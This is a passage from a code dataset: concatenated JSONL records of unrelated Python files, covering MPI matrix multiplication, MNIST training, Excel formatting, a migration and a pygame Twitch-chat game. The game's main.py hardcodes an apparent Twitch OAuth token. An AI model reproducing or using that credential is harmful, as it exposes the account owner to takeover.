local_output_mat = []\n gathered_output_mat = []\n\n\n startTime = 0.0\n endTime = 0.0\n \n #print(\"MPI Initiated\")\n with open(\"1000x1000_matrix.txt\",'r') as f:\n for line in f:\n int_string_list = line.split()\n float_list = [float(i) for i in int_string_list]\n for i in float_list:\n list_mat.append(i)\n list_mat2.append(i)\n\n #print(\"Read from file done.\")\n f.close()\n\n startTime = MPI.Wtime()\n if RANK == MASTER:\n for process in range(1, SIZE):\n COMM.send(list_mat[(process-1) * chunkSize:], process, 1)\n COMM.send(list_mat2, process, 2)\n #print(\"Send from Master done.\")\n\n if RANK != MASTER:\n local_mat = COMM.recv(source=MASTER, tag=1)\n local_mat2 = COMM.recv(source=MASTER, tag=2)\n #print(\"Recv from client done.\")\n local_output_mat = [0 for zero in range(col_split * 1000)]\n mat_mult_1d(local_mat, col_split, 1000, local_mat2, 1000, 1000, local_output_mat, col_split, 1000)\n #print(local_output_mat[(col_split * 1000) - 1])\n COMM.send(local_output_mat, MASTER, 3)\n #print(\"Send from client done.\")\n\n if RANK == MASTER:\n for process in range(1, SIZE):\n gathered_output_mat[(process-1) * chunkSize:] = COMM.recv(source=process, tag=3)\n\n #print(\"Recv from client done.\")\n #print(gathered_output_mat[999999])\n endTime = MPI.Wtime()\n print(\"%s\" % (endTime - startTime))\n\n#@jit\ndef mat_mult_1d(mat1, mat1_row, mat1_col, mat2, mat2_row, mat2_col, output_mat, output_mat_row, output_mat_col):\n \n #start_time = time.time()\n\n for i in 
range(int(mat1_row)):\n for j in range(int(mat2_col)):\n var_sum = float(0.0)\n for k in range(int(mat2_row)):\n var_sum += mat1[i * mat1_col + k] * mat2[k * mat2_col + j]\n output_mat[i * output_mat_col + j] = var_sum\n #end_time = time.time()\n\n #print(type(output_mat[0]), \"took\",\"--- %s seconds ---\" % (end_time - start_time))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"benchmarks/InProgress/mpi_matmul_sr_1dList.py","file_name":"mpi_matmul_sr_1dList.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"652705117","text":"def rotate_matrix(mat, sz):\n\n rm_helper(mat, sz, 0)\n\n\ndef rm_helper(mat, sz, offset):\n\n if sz <= 1:\n return\n\n for x in range(sz-1):\n\n # Save top row\n storage = mat[0 + offset][x + offset]\n\n # Right column -> top row\n mat[0 + offset][x + offset] = mat[x + offset][(sz-1) + offset]\n\n # Bottom row -> right column\n mat[x + offset][(sz-1) + offset] = mat[(sz-1) + offset][(sz-1-x) + offset]\n\n # Left column -> bottom row\n mat[(sz-1) + offset][(sz-1-x) + offset] = mat[(sz-1-x) + offset][0 + offset]\n\n # Top row (saved) -> left column\n mat[(sz-1-x) + offset][0 + offset] = storage\n\n # Do inner matrix.\n rm_helper(mat, sz-2, offset+1)\n","sub_path":"1. Arrays and Strings/strings_seven.py","file_name":"strings_seven.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"233430222","text":"import re\n\n\nclass Phone:\n def __init__(self, phone_number):\n m = re.search(\n r'''^(?:\\+?1)?\\s*\n \\(?(?P[2-9]\\d\\d)\\)?\n [. -]*\n (?P[2-9]\\d\\d)\n [. -]*\n (?P\\d{4})\n \\s*$''',\n phone_number, flags=re.VERBOSE)\n\n if m is None:\n raise ValueError(\"Invalid number\")\n\n self.area_code = m.group(\"area\")\n self.exchange_code = m.group(\"exchange\")\n self.subscriber_code = m.group(\"subscriber\")\n self.number = self.area_code + self.exchange_code + self.subscriber_code\n\n def pretty(self):\n return f\"({self.area_code}) {self.exchange_code}-{self.subscriber_code}\"\n","sub_path":"python/phone-number/phone_number.py","file_name":"phone_number.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"376209176","text":"import os\ndirname = os.path.dirname(os.path.realpath(__file__))\nrootdir = os.path.dirname(dirname)\n\nimport sys\nsys.path.insert(0, rootdir)\n\n#from os import errno\n\nimport time\nimport unittest\n\nimport pandas as pd\nimport xlsxwriter\n\nfrom wrappers.logger import loggerFetch\n\n###\n\n\n#######################\n# Global Declarations\n#######################\n\ntimeout = 10\n#dirname = 'BasiaSamples'\n\n\n#############\n# Functions\n#############\n\ndef get_col_widths(dataframe):\n # First we find the maximum length of the index column \n idx_max = max([len(str(s)) for s in dataframe.index.values] + [len(str(dataframe.index.name))])\n # Then, we concatenate this to the max of the lengths of column name and its values for each column, left to right\n return [idx_max] + [max([len(str(s)) for s in dataframe[col].values] + [len(col)]) for col in dataframe.columns]\n\n\n\ndef printify(logger, filename=None, max_width=None):\n if not filename:\n filename = 'z.csv'\n xlsfile = filename.replace('.csv', '.xlsx')\n logger.info('Printify file [%s]' % filename)\n\n if not max_width:\n max_width = 25\n\n fields = ['गांव', 'WorkerID']\n df = 
pd.read_csv(filename, index_col='WorkerID', header=0, encoding = 'utf-8-sig') # , index_col=fields)\n\n #logger.info(df)\n print(df.head())\n if 'sample' in filename:\n df = df.sort_values(by=['गांव', 'Category', 'WorkerID'], ascending=[True, False, True])\n else:\n #df = df.sort_values(by=['गांव', df.columns[6], df.columns[0]], ascending=[True, False, True])\n df = df.sort_values(by=['गांव', 'पेमेंट की स्तिथि', 'WorkerID'], ascending=[True, False, True])\n\n '''\n df.columns[0] = 'Sl No.'\n df['Sl No.'] = df.index\n '''\n df = df.reset_index()\n df.insert(0, 'Sl No.', range(1, len(df)+1))\n df.set_index('Sl No.', inplace=True)\n #df.reset_index(drop = True, inplace = True)\n\n print(df.head())\n\n #df.style.set_table_styles([dict(selector=\"th\",props=[('max-width', '50px')])])\n #s.str.wrap(12)\n #print(df.style)\n #logger.info(df)\n\n \n # Create a Pandas Excel writer using XlsxWriter as the engine.\n writer = pd.ExcelWriter(xlsfile, engine='xlsxwriter')\n\n # Convert the dataframe to an XlsxWriter Excel object.\n df.to_excel(writer, sheet_name='Sheet1')\n\n # Get the xlsxwriter workbook and worksheet objects.\n workbook = writer.book\n worksheet = writer.sheets['Sheet1']\n\n \n ####################################\n ########### Page Setup #############\n ####################################\n\n worksheet.set_landscape()\n worksheet.set_paper(9) # A4\n # worksheet.set_zoom(66)\n # worksheet.center_horizontally()\n # worksheet.center_vertically()\n\n # Set Margins - worksheet.set_margins([left=0.7,] right=0.7,] top=0.75,] bottom=0.75]]])\n # worksheet.set_margins(0.7, 0.7, 0.75, 0.75)\n worksheet.set_margins(0.25, 0.25, 0.25, 0.25)\n\n # Header - set_header([header='',] options]])\n # e.g worksheet.set_header('&C%s' % filename)\n # worksheet.set_header(filename) # Default Center Justified\n worksheet.set_header('&C%s' % os.path.basename(filename))\n \n # worksheet.set_header('&CPage &P of &N') # Page 1 of 6\n # worksheet.set_header('&CUpdated at &T') # Updated at 12:30 PM\n\n # Footer - set_footer([footer='',] options]])\n worksheet.set_footer('&CPage &P of &N') # Page 1 of 6\n #worksheet.set_header('&CUpdated at &T') # Updated at 12:30 PM\n\n # Repeat rows - repeat_rows(first_row[, last_row])\n worksheet.repeat_rows(0) # Header Repeat\n\n # Grid lines\n '''\n The following values of option are valid:\n \n Don’t hide gridlines.\n Hide printed gridlines only.\n Hide screen and printed gridlines.\n \n '''\n # worksheet.hide_gridlines()\n \n # Row Column Headers - print_row_col_headers()\n # worksheet.print_row_col_headers()\n\n # Define print area - worksheet.print_area()\n # worksheet1.print_area('A1:H20') # Cells A1 to H20.\n # worksheet2.print_area(0, 0, 19, 7) # The same as above.\n\n # Print Across\n # worksheet.print_across()\n\n # Fit To Page - worksheet.fit_to_pages()\n # worksheet1.fit_to_pages(1, 1) # Fit to 1x1 pages.\n # worksheet2.fit_to_pages(2, 1) # Fit to 2x1 pages.\n # worksheet3.fit_to_pages(1, 2) # Fit to 1x2 pages.\n\n # Start print from page 2.\n # worksheet.set_start_page(2)\n\n # Set Print Scale - set_print_scale()\n worksheet.set_print_scale(66)\n\n # Page Breaks - worksheet.set_h_pagebreaks()\n # worksheet.set_h_pagebreaks([20]) # Break between row 20 and 21.\n # worksheet2.set_h_pagebreaks([20, 40, 60, 80, 100])\n\n # NOTE: replace h with v for vertical breaks - worksheet.set_v_pagebreaks()\n \n \n ####################################\n ########### Formatting #############\n ####################################\n \n # Add a bold format to use to highlight cells.\n 
bold = workbook.add_format({'bold': True})\n # Make header bold\n worksheet.set_row(0, None, bold)\n \n # Cell Format approach\n \n cell_format = workbook.add_format()\n # worksheet.set_row(0, None, cell_format.set_bold())\n\n # Align all centers horizontally and vertically\n cell_format.set_align('center')\n cell_format.set_align('vcenter')\n cell_format.set_align('vjustify')\n cell_format.set_text_wrap()\n cell_format.set_font_size(10)\n cell_format.set_border(1)\n\n # Font Family\n cell_format.set_font('Liberation Sans')\n #cell_format.set_font_family(''Liberation Sans'')\n cell_format.set_font_family('Liberation Sans')\n # cell_format.set_font_charset(178)\n '''\n # Set the format but not the column width.\n worksheet.set_column('C:C', None, format2)\n\n # Set the format but not the column width.\n worksheet.set_column('C:C', None, cell_format)\n '''\n\n worksheet.set_column('A:Z', None, cell_format)\n \n for i, width in enumerate(get_col_widths(df)):\n if width > max_width:\n width = max_width\n worksheet.set_column(i, i, width)\n # worksheet.set_default_row(20)\n # workbook.close()\n\n worksheet.set_row(0, None, cell_format)\n\n \n # Close the Pandas Excel writer and output the Excel file.\n writer.save()\n \n return 'SUCCESS'\n \n\n # iter_csv = pd.read_csv(file, iterator=True, chunksize=1000)\n # df = pd.concat([chunk[chunk['field'] > constant] for chunk in iter_csv]) \n '''\n try:\n with open(filename, 'r') as csv_file:\n logger.info('Reading [%s]' % filename)\n csv_source = csv_file.read()\n except Exception as e:\n logger.error('Exception when opening file[%s] - EXCEPT[%s:%s]' % (filenametype(e), e))\n raise e\n\n data = pd.DataFrame([], columns=['S.No', 'Mandal Name', 'Gram Panchayat', 'Village', 'Job card number/worker ID', 'Name of the wageseeker', 'Credited Date', 'Deposit (INR)', 'Debited Date', 'Withdrawal (INR)', 'Available Balance (INR)', 'Diff. 
time credit and debit'])\n try:\n df = pd.read_html(filename, attrs = {'id': 'ctl00_MainContent_dgLedgerReport'}, index_col='S.No.', header=0)[0]\n except Exception as e:\n logger.error('Exception when reading transaction table for jobcard[%s] - EXCEPT[%s:%s]' % (filename, type(e), e))\n return data\n logger.info('The transactions table read:\\n%s' % df)\n \n\n df = df.iloc[::-1] # Reverse the order for calculating diff time Debit dates are easier to record in this order\n for index, row in df.iterrows():\n logger.debug('%d: %s' % (index, row))\n\n serial_no = index\n logger.debug('serial_no[%s]' % serial_no)\n\n transaction_date = row['Transaction Date']\n logger.debug('transaction_date[%s]' % transaction_date)\n\n transaction_ref = row['Transaction Reference']\n logger.debug('transaction_ref[%s]' % transaction_ref)\n\n withdrawn_at = row['Withdrawn at']\n logger.debug('withdrawn_at[%s]' % withdrawn_at)\n\n deposit_inr = row['Deposit (INR)']\n logger.debug('deposit_inr[%s]' % deposit_inr)\n\n withdrawal_inr = row['Withdrawal (INR)']\n logger.debug('withdrawal_inr[%s]' % withdrawal_inr)\n\n availalbe_balance = row['Available Balance (INR)']\n logger.debug('availalbe_balance[%s]' % availalbe_balance)\n\n if deposit_inr == 0:\n (credited_date, debited_date, diff_time, debit_timestamp) = (transaction_date, 0, 0, pd.to_datetime(transaction_date, dayfirst=True)) # datetime.strptime(transaction_date, \"%d/%m/%Y\").timestamp())\n else:\n (credited_date, debited_date, diff_time) = (0, transaction_date, debit_timestamp - pd.to_datetime(transaction_date, dayfirst=True)) # datetime.strptime(transaction_date, \"%d/%m/%Y\").timestamp())\n logger.debug('credited_date[%s]' % credited_date)\n logger.debug('debited_date[%s]' % debited_date)\n logger.debug('diff_time[%s]' % diff_time)\n \n #csv_buffer.append('%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\\n' %(serial_no, mandal_name, bo_name, so_name, jobcard_id, account_holder_name, credited_date, debited_date, withdrawal_inr, availalbe_balance, diff_time))\n data = data.append({'S.No': serial_no, 'Mandal Name': mandal_name, 'Gram Panchayat': panchayat_name, 'Village': village_name, 'Job card number/worker ID': jobcard_id, 'Name of the wageseeker': account_holder_name, 'Credited Date': credited_date, 'Deposit (INR)': deposit_inr, 'Debited Date': debited_date, 'Withdrawal (INR)': withdrawal_inr, 'Available Balance (INR)': availalbe_balance, 'Diff. 
time credit and debit': diff_time}, ignore_index=True)\n\n data = data.set_index('S.No')\n data = data.iloc[::-1] # Reverse the order back to normal \n logger.info('The final table:\\n%s' % data)\n\n return data\n '''\n\nclass TestSuite(unittest.TestCase):\n def setUp(self):\n self.logger = loggerFetch('info')\n self.logger.info('BEGIN PROCESSING...')\n\n def tearDown(self):\n self.logger.info('...END PROCESSING')\n\n def test_printify(self):\n dirname = 'Jawaja'\n dirname = 'Dewata'\n for filename in os.listdir(dirname):\n result = printify(self.logger, filename=os.path.join(dirname,filename), max_width=30)\n self.assertEqual(result, 'SUCCESS')\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/scripts/printify.py","file_name":"printify.py","file_ext":"py","file_size_in_byte":10372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"537050340","text":"# coding: utf-8\n# # TensorFlow\n# ## 3-layer classifier (mnist)\n# ## [try]\n# - Try changing the optimizer\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\niters_num = 3000\nbatch_size = 100\nplot_interval = 100\n\nhidden_layer_size_1 = 600\nhidden_layer_size_2 = 300\n\ndropout_rate = 0.5\n\nx = tf.placeholder(tf.float32, [None, 784])\nd = tf.placeholder(tf.float32, [None, 10])\nW1 = tf.Variable(tf.random_normal([784, hidden_layer_size_1], stddev=0.01))\nW2 = tf.Variable(tf.random_normal([hidden_layer_size_1, hidden_layer_size_2], stddev=0.01))\nW3 = tf.Variable(tf.random_normal([hidden_layer_size_2, 10], stddev=0.01))\n\nb1 = tf.Variable(tf.zeros([hidden_layer_size_1]))\nb2 = tf.Variable(tf.zeros([hidden_layer_size_2]))\nb3 = tf.Variable(tf.zeros([10]))\n\nz1 = tf.sigmoid(tf.matmul(x, W1) + b1)\nz2 = tf.sigmoid(tf.matmul(z1, W2) + b2)\n\nkeep_prob = tf.placeholder(tf.float32)\ndrop = tf.nn.dropout(z2, keep_prob)\n\ny = tf.nn.softmax(tf.matmul(drop, W3) + b3)\nloss = tf.reduce_mean(-tf.reduce_sum(d * tf.log(y), reduction_indices=[1]))\n\n# - Try changing the optimizer (this file's variant uses RMSProp)\n# optimizer = tf.train.AdamOptimizer(1e-4)\n# optimizer = tf.train.MomentumOptimizer(0.1, 0.9)\noptimizer = tf.train.RMSPropOptimizer(0.001)\n\ntrain = optimizer.minimize(loss)\ncorrect = tf.equal(tf.argmax(y, 1), tf.argmax(d, 1))\naccuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\nfrom datetime import datetime\naccuracies = []\nfor i in range(iters_num):\n x_batch, d_batch = mnist.train.next_batch(batch_size)\n sess.run(train, feed_dict={x:x_batch, d:d_batch, keep_prob:(1 - dropout_rate)})\n if (i+1) % plot_interval == 0:\n accuracy_val = sess.run(accuracy, feed_dict={x:mnist.test.images, d:mnist.test.labels, keep_prob:1.0}) \n accuracies.append(accuracy_val)\n print (datetime.now ().strftime ('%H:%M:%S') + ' Generation: ' + str (i + 1) + '. 
正解率 = ' + str (\n round (100 * accuracy_val, 2)) + '%')\n \nlists = range(0, iters_num, plot_interval)\nplt.plot(lists, accuracies)\nplt.title(\"accuracy 3(mnist) hidden_layer(600,300) RMSProp\")\nplt.ylim(0, 1.0)\nplt.show() \n","sub_path":"L4/4_1/4_1_tensorflow_4_分類3層(mnist)_04_RMSProp.py","file_name":"4_1_tensorflow_4_分類3層(mnist)_04_RMSProp.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"360294522","text":"import multiprocessing as mp\nimport os\nimport time\nimport pygame\nimport configparser \nimport sys\nimport pprint\nimport random\nimport utils , twitchchat, modsloader\nimport copy\nfrom copy import deepcopy\nglobal main_dir , locale\n\nmain_dir = os.path.split(os.path.abspath(sys.argv[0]))[0]\nlocale = \"de_DE\"\n\nif not pygame.font: print('Fehler pygame.font Modul konnte nicht geladen werden!')\nif not pygame.mixer: print('Fehler pygame.mixer Modul konnte nicht geladen werden!')\n\ndef main():\n heros_list = {} \n enemy_list = {}\n items_list = {}\n locale_list = {}\n question_list = {}\n persons_list = {}\n attribute_list = {}\n players_list = {}\n mods_list=\"\"\n mods_module = {}\n image_scale = 2\n pygame.init()\n fps_clock = pygame.time.Clock()\n myfont = pygame.font.SysFont(\"arial\", 14)\n myfont.set_bold(True)\n pygame.mouse.set_visible(1)\n pygame.key.set_repeat(1, 1)\n pygame.display.set_caption(\"Loading...INIT\")\n displaysizes = [1024 , 576] , [1280,720] , [1600,900] , [1920,1080] , [2048,1152] , [2560,1440] , [3200,1800], [3840,2160], [4096,2304], [5120,2880] , [7680,4320] , [15360,8640]\n #screen = pygame.display.set_mode(displaysize , pygame.FULLSCREEN )\n screen = pygame.display.set_mode(displaysizes[0])\n \n pygame.display.set_caption(\"Loading...MODS\")\n\n\n mods_list = modsloader.getMods(main_dir)\n #pprint.pprint (mods_list)\n for list in mods_list:\n print(\"Loading Mod:\" , list)\n mod = modsloader.loadMods((mods_list[list]))\n \n load = mod.loadattribute(os.path.join(main_dir,\"mods\",list))\n if not load == None:\n attribute_list[list] = load\n \n load = mod.loaditems(os.path.join(main_dir,\"mods\",list)) \n if not load == None:\n items_list[list] = load\n \n load = mod.loadlocale(os.path.join(main_dir,\"mods\",list), locale ) \n if not load == None:\n locale_list[list] = load\n \n load = mod.loadquestion(os.path.join(main_dir,\"mods\",list)) \n if not load == None:\n question_list[list] = load\n \n load = mod.loadpersons(os.path.join(main_dir,\"mods\",list))\n if not load == None: \n persons_list[list] = load\n\n \n #pprint.pprint (mods_list)\n #pprint.pprint (locale_list)\n for modname in persons_list:\n heros_list[modname] = {}\n enemy_list[modname] = {}\n for persons in persons_list[modname]:\n \n if persons_list[modname][persons][\"type\"] == \"hero\":\n heros_list[modname][persons] = {}\n heros_list[modname][persons] = {\"name\" : persons_list[modname][persons][\"name\"] , \"image\" : persons_list[modname][persons][\"image\"]}\n heros_list[modname][persons][\"attribute\"] = {modname : persons_list[modname][persons][\"attribute\"] }\n elif persons_list[modname][persons][\"type\"] == \"enemy\":\n enemy_list[modname][persons] = {} \n enemy_list[modname][persons] = {\"name\" : persons_list[modname][persons][\"name\"] , \"image\" : persons_list[modname][persons][\"image\"]}\n enemy_list[modname][persons][\"attribute\"] = {modname : persons_list[modname][persons][\"attribute\"] }\n enemy_list[modname][persons][\"surface\"] = utils.image_transform_scale 
(utils.loadImage (os.path.join(main_dir,\"mods\",modname, \"img\",persons_list[modname][persons][\"image\"][\"img\"]) , int(persons_list[modname][persons][\"image\"][\"tiles\"]) , int(persons_list[modname][persons][\"image\"][\"weight\"]) , int(persons_list[modname][persons][\"image\"][\"height\"]) ,persons_list[modname][persons][\"image\"][\"colorkey\"]), image_scale)\n \n for mod_attribute in attribute_list:\n for attribute in attribute_list[mod_attribute]:\n for enemy_list_mod in enemy_list:\n for persons in enemy_list[enemy_list_mod]:\n #print (enemy_list[enemy_list_mod][persons] , \"&&&\")\n if enemy_list[enemy_list_mod][persons][\"attribute\"].get(mod_attribute , None) == None:\n enemy_list[enemy_list_mod][persons][\"attribute\"][mod_attribute] = {}\n if enemy_list[enemy_list_mod][persons][\"attribute\"][mod_attribute].get(attribute , None) == None:\n enemy_list[enemy_list_mod][persons][\"attribute\"][mod_attribute][attribute] = None \n for hero_list_mod in heros_list:\n for persons in heros_list[hero_list_mod]:\n if heros_list[hero_list_mod][persons][\"attribute\"].get(mod_attribute , None) == None:\n heros_list[hero_list_mod][persons][\"attribute\"][mod_attribute] = {}\n if heros_list[hero_list_mod][persons][\"attribute\"][mod_attribute].get(attribute , None) == None:\n heros_list[hero_list_mod][persons][\"attribute\"][mod_attribute][attribute] = None \n\n #print (\"&&&&\" , enemy_list , \"&&&&\")\n\n #pprint.pprint (heros_list)\n #pprint.pprint (enemy_list)\n print (\"Wähle dein Helden\")\n i = 0\n i_list=[]\n for modname in heros_list:\n for heros in heros_list[modname]:\n print (i , \":\" , heros_list[modname][heros][\"name\"])\n i_list.append ([modname ,heros])\n i += 1\n print (\"Wähle dein Helden\") \n while True:\n try:\n print (\"Bitte geben sie eine Zahl ein.\")\n hero_number = int(input())\n except ValueError:\n print(\"Keine Zahl eingeben!?\")\n continue\n else:\n break\n #print (\"###\",i_list[hero_number][0],\"###\")\n modname = i_list[hero_number][0]\n heroname = i_list[hero_number][1]\n hero_stats = {\"hero\" : heros_list[modname][heroname],\n \"modname\" : modname,\n \"x\":10,\n \"y\":10,\n \"direction\": 0,\n 'surface' : utils.image_transform_scale (utils.loadImage (os.path.join(main_dir,\"mods\",modname, \"img\",heros_list[modname][heroname][\"image\"][\"img\"]) , heros_list[modname][heroname][\"image\"][\"tiles\"] , heros_list[modname][heroname][\"image\"][\"weight\"] , heros_list[modname][heroname][\"image\"][\"height\"] , heros_list[modname][heroname][\"image\"][\"colorkey\"]), image_scale)\n }\n #pprint.pprint (hero_stats)\n \n #print (hero_stats[\"surface\"])\n \n #[username , [x,y] , direction , modname , enemy name]\n func_holen = mp.Queue()\n func_geben = mp.Queue()\n p = mp.Process(target=twitchchat.chatlog, args=(func_holen, func_geben, \"nitrama\" , \"oauth:zg88wf2fpqlnntcsqb1e7vx3sq3980\" , \"#nitrama\" , locale_list))\n p.start()\n \n pygame.display.set_caption(\"Starts\")\n \n for modlist in question_list:\n for q in question_list[modlist]:\n #print (question_list[modlist][q]) \n if question_list[modlist][q][\"type\"] == \"important\":\n #print (\"name:\", q)\n func_geben.put([q, question_list[modlist][q], modlist]) \n \n rounds = 0\n running = True\n while running:\n if func_holen.empty() == False:\n question_holen = func_holen.get()\n # fragen abholen\n mod = modsloader.loadMods((mods_list[question_holen[\"modname\"]]))\n #modsloader.loadMods((list))\n \n request = mod.questionrequest(question_holen , players_list, hero_stats , enemy_list , 
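The hero picker later in this record loops until int(input()) parses. The same retry pattern isolated, reading from a canned answer list so it runs non-interactively; the German prompts mirror the original:

answers = iter(["abc", "", "2"])  # stand-in for interactive input()

while True:
    try:
        print("Bitte geben sie eine Zahl ein.")  # "Please enter a number."
        hero_number = int(next(answers))
    except ValueError:
        print("Keine Zahl eingeben!?")  # "That wasn't a number!?"
        continue
    else:
        break
print(hero_number)  # 2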
items_list)\n \n for event in pygame.event.get():\n # Spiel beenden, wenn wir ein QUIT-Event finden.\n if event.type == pygame.QUIT:\n print (\"pressed escape\")\n p.terminate()\n pygame.display.quit()\n running = False\n break\n \n if event.type == pygame.KEYDOWN:\n # Wenn Escape gedrückt wird, posten wir ein QUIT-Event in Pygames Event-Warteschlange.\n if event.key == pygame.K_ESCAPE:\n print (\"pressed escape\")\n p.terminate()\n pygame.display.quit()\n running = False\n break\n if event.key == pygame.K_UP:\n hero_stats[\"y\"] -= hero_stats[speed_TXT]\n hero_stats[\"direction\"] = 1\n if event.key == pygame.K_DOWN:\n hero_stats[\"y\"] += hero_stats[speed_TXT]\n hero_stats[\"direction\"] = 0\n if event.key == pygame.K_LEFT:\n hero_stats[\"x\"] -= hero_stats[speed_TXT]\n hero_stats[\"direction\"] = 2\n if event.key == pygame.K_RIGHT:\n hero_stats[\"x\"] += hero_stats[speed_TXT]\n hero_stats[\"direction\"] = 3\n\n if running == True:\n #print (hero_stats[\"hero\"][\"image\"][\"height\"]*image_scale)\n playerrect = pygame.Rect(hero_stats[\"x\"], hero_stats[\"y\"],hero_stats[\"hero\"][\"image\"][\"weight\"]*image_scale, hero_stats[\"hero\"][\"image\"][\"height\"]*image_scale )\n for i in players_list:\n testrect = pygame.Rect(i[1][\"x\"], i[1][\"y\"], i[1][\"weight\"] * image_scale, i[1][\"height\"] * image_scale)\n if testrect.colliderect(playerrect):\n damage_player = i[2][attack_TXT] - hero_stats[defense_TXT]\n damage_play = hero_stats[attack_TXT] - i[2][defense_TXT]\n print (\"damage_play\" , damage_play)\n print (\"damage_player\" , damage_player)\n if damage_player > 0:\n hero_stats[health_TXT] -= damage_player\n if hero_stats[health_TXT] <= 0:\n print(\"game Over\")\n if damage_play > 0:\n i[2][health_TXT] -= damage_play\n if i[2][health_TXT] <= 0:\n players_list.remove(i)\n print (\"zombie kill\")\n print (\"collide\")\n \n pygame.display.set_caption(\"FPS:\"+str(fps_clock.get_fps()))\n fps_clock.tick(30) \n screen.fill((0,255,0))\n \n \"\"\"\n labelhealth = health_TXT + str(hero_stats[health_TXT]) + \"/\" + str(hero_stats[maxhealth_TXT])\n labelattack = attack_TXT + str(hero_stats[attack_TXT])\n labeldefense = defense_TXT + str(hero_stats[defense_TXT])\n labelspeed = speed_TXT + str(hero_stats[speed_TXT])\n labelitems = items_TXT + str(hero_stats[items_TXT])\n \n labelhealth = myfont.render(labelhealth , 0, (0,0,0))\n labelattack = myfont.render(labelattack , 0, (0,0,0))\n labeldefense = myfont.render(labeldefense , 0, (0,0,0))\n labelspeed = myfont.render(labelspeed , 0, (0,0,0))\n labelitems = myfont.render(labelitems , 0, (0,0,0))\n \n screen.blit(labelhealth, (0, 0))\n screen.blit(labelattack, (0,15))\n screen.blit(labeldefense, (0,30))\n screen.blit(labelspeed, (0,45))\n screen.blit(labelitems, (0,60))\n \"\"\"\n screen.blit (hero_stats[\"surface\"][hero_stats[\"direction\"]],(hero_stats[\"x\"],hero_stats[\"y\"]))\n for z in players_list:\n #print ()\n #print (zombies_stats[z[1][\"type\"]][z[1][\"direction\"]])\n screen.blit (z[1][\"surface\"][z[1][\"direction\"]] , (z[1][\"x\"],z[1][\"y\"]))\n pygame.display.flip()\n \nif __name__ == '__main__':\n mp.freeze_support() #für pyinstaller multiprocessing\n main()\n # Unsere Main-Funktion aufrufen","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"122075345","text":"#coding:utf-8\n\nimport os\nimport sys\nimport re\n\npath = '/data/www/baike_sql'\nsql_file = '%s/baike.sql' % path\nsql_file = 
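The game loop above keys hero stats with bare names like speed_TXT and attack_TXT that are never defined in the record (they read like intended string constants). A standalone sketch of the same Rect-collision damage exchange with plain string keys and hypothetical stats:

import pygame

hero = {"x": 10, "y": 10, "attack": 5, "defense": 2, "health": 20}
zombie = {"x": 12, "y": 12, "attack": 3, "defense": 1, "health": 8}
size = 16  # hypothetical sprite size in pixels

hero_rect = pygame.Rect(hero["x"], hero["y"], size, size)
zombie_rect = pygame.Rect(zombie["x"], zombie["y"], size, size)

if zombie_rect.colliderect(hero_rect):
    # Each side deals (its attack - the other's defense), floored at zero.
    hero["health"] -= max(0, zombie["attack"] - hero["defense"])
    zombie["health"] -= max(0, hero["attack"] - zombie["defense"])
    print("hero:", hero["health"], "zombie:", zombie["health"])  # hero: 19 zombie: 4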
open(sql_file, mode='a+', encoding='UTF-8')\n\ndef readDir(path):\n\tpathDir = os.listdir(path)\n\n\tfor item in pathDir:\n\t\tnew = '%s/%s' % (path, item)\n\t\tif os.path.isfile(new):\n\t\t\tsql = 'source %s;' % new\n\t\t\tsql_file.writelines(sql + '\\n')\n\t\t\tprint(sql)\n\t\telse:\n\t\t\treadDir(new)\n\nreadDir(path)\nsql_file.close()\n","sub_path":"source_sql.py","file_name":"source_sql.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"59113914","text":"\"\"\"empty message\n\nRevision ID: 087c2a9198cc\nRevises: e54b620851e1\nCreate Date: 2016-05-05 23:53:08.526756\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '087c2a9198cc'\ndown_revision = 'e54b620851e1'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('author', 'is_author',\n existing_type=mysql.TINYINT(display_width=1),\n type_=sa.Boolean(),\n existing_nullable=True)\n op.add_column('comment', sa.Column('comment_author', sa.String(length=100), nullable=True))\n op.drop_column('comment', 'author')\n op.alter_column('post', 'live',\n existing_type=mysql.TINYINT(display_width=1),\n type_=sa.Boolean(),\n existing_nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('post', 'live',\n existing_type=sa.Boolean(),\n type_=mysql.TINYINT(display_width=1),\n existing_nullable=True)\n op.add_column('comment', sa.Column('author', mysql.VARCHAR(length=100), nullable=True))\n op.drop_column('comment', 'comment_author')\n op.alter_column('author', 'is_author',\n existing_type=sa.Boolean(),\n type_=mysql.TINYINT(display_width=1),\n existing_nullable=True)\n ### end Alembic commands ###\n","sub_path":"migrations/versions/087c2a9198cc_.py","file_name":"087c2a9198cc_.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"418047547","text":"import unittest\r\n\r\nfrom is_day_in_regular_year import is_day_in_reg_year\r\n\r\nclass DayTestCase(unittest.TestCase):\r\n\r\n def test_pos(self):\r\n a = 1\r\n if a >= 1 and a <= 